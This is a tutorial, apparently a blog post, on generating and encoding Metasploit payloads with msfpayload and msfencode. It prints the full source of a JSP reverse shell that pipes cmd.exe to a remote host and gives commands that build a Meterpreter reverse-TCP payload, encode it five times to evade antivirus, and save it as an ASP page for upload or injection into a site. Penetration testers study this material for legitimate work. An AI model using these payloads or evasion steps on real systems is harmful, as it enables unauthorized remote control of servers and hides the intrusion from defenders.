There are several flavors you can now export your payloads in Metasploit, making the insertion of them more and more flexible.  If we use the msfpayload command alone we can generate the following output of buffers for the Payloads:

  • Perl
  • Ruby –
  • JavaScript
  • Executable
  • VBA Raw
  • The output for the programming languages can be used in exploit code being developed or inserted into programs, Raw can be passed to msfencode for further processing and the executable can be used to generate a single file executable that depending on the payload it will be the executable type created and Architecture.  Currently executables can be created for the following OS:

  • Windows (x86 and x64)
  • AIX (PPC)
  • Solaris (Sparc and x86)
  • Linux (Mips, PPC and x86)
  • OSX (ARM, PPC and Intel)
  • BSD (Sparc and x86)
  • To get a list of all payloads and their description just run the program msfpayload wit the –h flag:

      1: ./msfpayload -h
    
      2:
    
      3:     Usage: ./msfpayload <payload> [var=val] <[S]ummary|C|[P]erl|Rub[y]|[R]aw|[J]avascript|e[X]ecutable|[V]BA>
    
      4:
    
      5: Framework Payloads (198 total)
    
      6: ==============================
    
      7:
    
      8:     Name                                             Description
    
      9:     ----                                             -----------
    
     10: ................
    
     11:     java/jsp_shell_bind_tcp                          Listen for a connection and spawn a command shell
    
     12:     java/jsp_shell_reverse_tcp                       Connect back to attacker and spawn a command shell
    
     13:
    
     14: ................
    
     15:     php/bind_perl                                    Listen for a connection and spawn a command shell via perl (persistent)
    
     16:     php/bind_php                                     Listen for a connection and spawn a command shell via php
    
     17:     php/download_exec                                Download an EXE from a HTTP URL and execute it
    
     18:     php/exec                                         Execute a single system command
    
     19:     php/reverse_perl                                 Creates an interactive shell via perl
    
     20:     php/reverse_php                                  Reverse PHP connect back shell with checks for disabled functions
    
     21:     php/shell_findsock
    
     22: 				Spawn a shell on the established connection to
    
     23: 				the webserver.  Unfortunately, this payload
    
     24: 				leaves conspicuous evil-looking entries in the
    
     25: 				apache error logs, so it is probably a good idea
    
     26: 				to use a bind or reverse shell unless firewalls
    
     27: 				prevent them from working.  The issue this
    
     28: 				payload takes advantage of (CLOEXEC flag not set
    
     29: 				on sockets) appears to have been patched on the
    
     30: 				Ubuntu version of Apache and may not work on
    
     31: 				other Debian-based distributions.  Only tested on
    
     32: 				Apache but it might work on other web servers
    
     33: 				that leak file descriptors to child processes.

    If we take a look at the snipped of output shown bellow you can see that several payloads are actually code that we can turn to code that can be placed in a web server for execution, the 2 types of payloads that allow us to do this are Java jsp and PHP code, just set the output to Raw and save the output to a file.

    To get the list of options you just use the Summarize option.

      1: ./msfpayload java/jsp_shell_reverse_tcp S
    
      2:
    
      3:        Name: Java JSP Command Shell, Reverse TCP Inline
    
      4:     Version: 7550
    
      5:    Platform: Windows, OSX, Linux, Unix, Solaris
    
      6:        Arch: java
    
      7: Needs Admin: No
    
      8:  Total size: 0
    
      9:        Rank: Normal
    
     10:
    
     11: Provided by:
    
     12:   sf <stephen_fewer@harmonysecurity.com>
    
     13:
    
     14: Basic options:
    
     15: Name   Current Setting  Required  Description
    
     16: ----   ---------------  --------  -----------
    
     17: LHOST                   yes       The local address
    
     18: LPORT  4444             yes       The local port
    
     19: SHELL  cmd.exe          yes       The system shell to use.
    
     20:
    
     21: Description:
    
     22:   Connect back to attacker and spawn a command shell
    
     23: 

    Lets generate a JSP file with some options so as to run it on a Windows server supporting JSP like an Oracle Application server

      1: ./msfpayload java/jsp_shell_reverse_tcp LHOST=192.168.1.224,LPORT=8080 R > /tmp/reversejsp.jsp

    if we now take a look at the code generated it will look like this:

      1:
    
      2: 			<%@page import="java.lang.*"%>
    
      3: 			<%@page import="java.util.*"%>
    
      4: 			<%@page import="java.io.*"%>
    
      5: 			<%@page import="java.net.*"%>
    
      6:
    
      7: 			<%
    
      8: 				class StreamConnector extends Thread
    
      9: 				{
    
     10: 					InputStream is;
    
     11: 					OutputStream os;
    
     12:
    
     13: 					StreamConnector( InputStream is, OutputStream os )
    
     14: 					{
    
     15: 						this.is = is;
    
     16: 						this.os = os;
    
     17: 					}
    
     18:
    
     19: 					public void run()
    
     20: 					{
    
     21: 						BufferedReader in  = null;
    
     22: 						BufferedWriter out = null;
    
     23: 						try
    
     24: 						{
    
     25: 							in  = new BufferedReader( new InputStreamReader( this.is ) );
    
     26: 							out = new BufferedWriter( new OutputStreamWriter( this.os ) );
    
     27: 							char buffer[] = new char[8192];
    
     28: 							int length;
    
     29: 							while( ( length = in.read( buffer, 0, buffer.length ) ) > 0 )
    
     30: 							{
    
     31: 								out.write( buffer, 0, length );
    
     32: 								out.flush();
    
     33: 							}
    
     34: 						} catch( Exception e ){}
    
     35: 						try
    
     36: 						{
    
     37: 							if( in != null )
    
     38: 								in.close();
    
     39: 							if( out != null )
    
     40: 								out.close();
    
     41: 						} catch( Exception e ){}
    
     42: 					}
    
     43: 				}
    
     44:
    
     45: 				try
    
     46: 				{
    
     47: 					Socket socket = new Socket( "192.168.1.224", 8080 );
    
     48: 					Process process = Runtime.getRuntime().exec( "cmd.exe" );
    
     49: 					( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();
    
     50: 					( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
    
     51: 				} catch( Exception e ) {}
    
     52: 			%>
    
     53: 		

    As it can be seen this is code where the code in lines 47 thru 50 is executing the cmd.exe command and piping the output thru a socket back to the attacker, the shell is also an option that can be changed to be /bin/bash if setting on a Linux host.

    Now if we want other formats not included in msfpayload and we want to also obfuscate by encoding our payload so as to make it more difficult to detect by AV (Anti Virus) and HIPS (Host Intrusion Prevention System) we use the msfencode command:

      1: ./msfencode -h
    
      2:
    
      3:     Usage: ./msfencode <options>
    
      4:
    
      6:
    
      7:     -a <opt>  The architecture to encode as
    
      8:     -b <opt>  The list of characters to avoid: '\x00\xff'
    
      9:     -c <opt>  The number of times to encode the data
    
     10:     -e <opt>  The encoder to use
    
     11:     -h        Help banner
    
     12:     -i <opt>  Encode the contents of the supplied file path
    
     13:     -l        List available encoders
    
     14:     -m <opt>  Specifies an additional module search path
    
     15:     -n        Dump encoder information
    
     16:     -o <opt>  The output file
    
     17:     -p <opt>  The platform to encode for
    
     18:     -s <opt>  The maximum size of the encoded data
    
     19:     -t <opt>  The format to display the encoded buffer with (c, elf, exe, java, perl, raw, ruby, vba, vbs, loop-vbs, asp)
    
     20:     -x <opt>  Specify an alternate win32 executable template
    
     21:
    

     

    By piping the Raw output to msfencode we can manipulate even more the payload, some of the most used options are the following:

  • -a for specifying the architecture(x86, x64).
  • -c to specify the number of encoded to do.
  • -i for the encode type.
  • -t for the format of the buffer.
  • There are different encoding types and they are rated on their effectiveness, to get a list we use the –l option:

      1: ./msfencode -l
    
      2:
    
      3: Framework Encoders
    
      4: ==================
    
      5:
    
      6:     Name                    Rank       Description
    
      7:     ----                    ----       -----------
    
      8:     cmd/generic_sh          good       Generic Shell Variable Substitution Command Encoder
    
      9:     cmd/ifs                 low        Generic ${IFS} Substitution Command Encoder
    
     10:     generic/none            normal     The "none" Encoder
    
     11:     mipsbe/longxor          normal     XOR Encoder
    
     12:     mipsle/longxor          normal     XOR Encoder
    
     13:     php/base64              normal     PHP Base64 encoder
    
     14:     ppc/longxor             normal     PPC LongXOR Encoder
    
     15:     ppc/longxor_tag         normal     PPC LongXOR Encoder
    
     16:     sparc/longxor_tag       normal     SPARC DWORD XOR Encoder
    
     17:     x64/xor                 normal     XOR Encoder
    
     18:     x86/alpha_mixed         low        Alpha2 Alphanumeric Mixedcase Encoder
    
     19:     x86/alpha_upper         low        Alpha2 Alphanumeric Uppercase Encoder
    
     20:     x86/avoid_utf8_tolower  manual     Avoid UTF8/tolower
    
     21:     x86/call4_dword_xor     normal     Call+4 Dword XOR Encoder
    
     22:     x86/countdown           normal     Single-byte XOR Countdown Encoder
    
     23:     x86/fnstenv_mov         normal     Variable-length Fnstenv/mov Dword XOR Encoder
    
     24:     x86/jmp_call_additive   normal     Jump/Call XOR Additive Feedback Encoder
    
     25:     x86/nonalpha            low        Non-Alpha Encoder
    
     26:     x86/nonupper            low        Non-Upper Encoder
    
     27:     x86/shikata_ga_nai      excellent  Polymorphic XOR Additive Feedback Encoder
    
     28:     x86/unicode_mixed       manual     Alpha2 Alphanumeric Unicode Mixedcase Encoder
    
     29:     x86/unicode_upper       manual     Alpha2 Alphanumeric Unicode Uppercase Encoder

    The highest one rank is x86/shikata_ga_nai for X86 code, do notice that depending on the payload you must be careful that the encoding and the architecture for which you are generating the payload match.

    In the format buffers we get the same as with msfpayload but we also get some very interesting ones like:

  • elf – ELF (Executable and Linking Format) Binary executable for Linux system
  • vbs – Visual Basic Scripting
  • loop-vbs-  Visual Basic Script that will loop and re-execute every x number of seconds specified in the options
  • ASP – Active Server Pages from Microsoft’s .Net Framework.
  • As it can be seen we have some very interesting options for outputting our code and delivering it to our targets.

    Lets generate a Meterpreter payload, encoded several times and convert it to an ASP page:

      1: ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.224,LPORT=993 R | ./msfencode -c 5 -e x86/shikata_ga_nai -a X86 -t asp > evilpage.asp
    
      2: [*] x86/shikata_ga_nai succeeded with size 318 (iteration=1)
    
      3:
    
      4: [*] x86/shikata_ga_nai succeeded with size 345 (iteration=2)
    
      5:
    
      6: [*] x86/shikata_ga_nai succeeded with size 372 (iteration=3)
    
      7:
    
      8: [*] x86/shikata_ga_nai succeeded with size 399 (iteration=4)
    
      9:
    
     10: [*] x86/shikata_ga_nai succeeded with size 426 (iteration=5

    Now this ASP page can be uploaded to a web server or place inside the code of a valid ASP page thru injection.

    One important note is the more you encode the bigger the file so keep that in mind if your delivery mechanism is affected by the size.

    As it can be seen Metasploit gives a large set of formats to export our payloads thus giving greater flexibility on avenues of attack.

    About the author

    Leave a Reply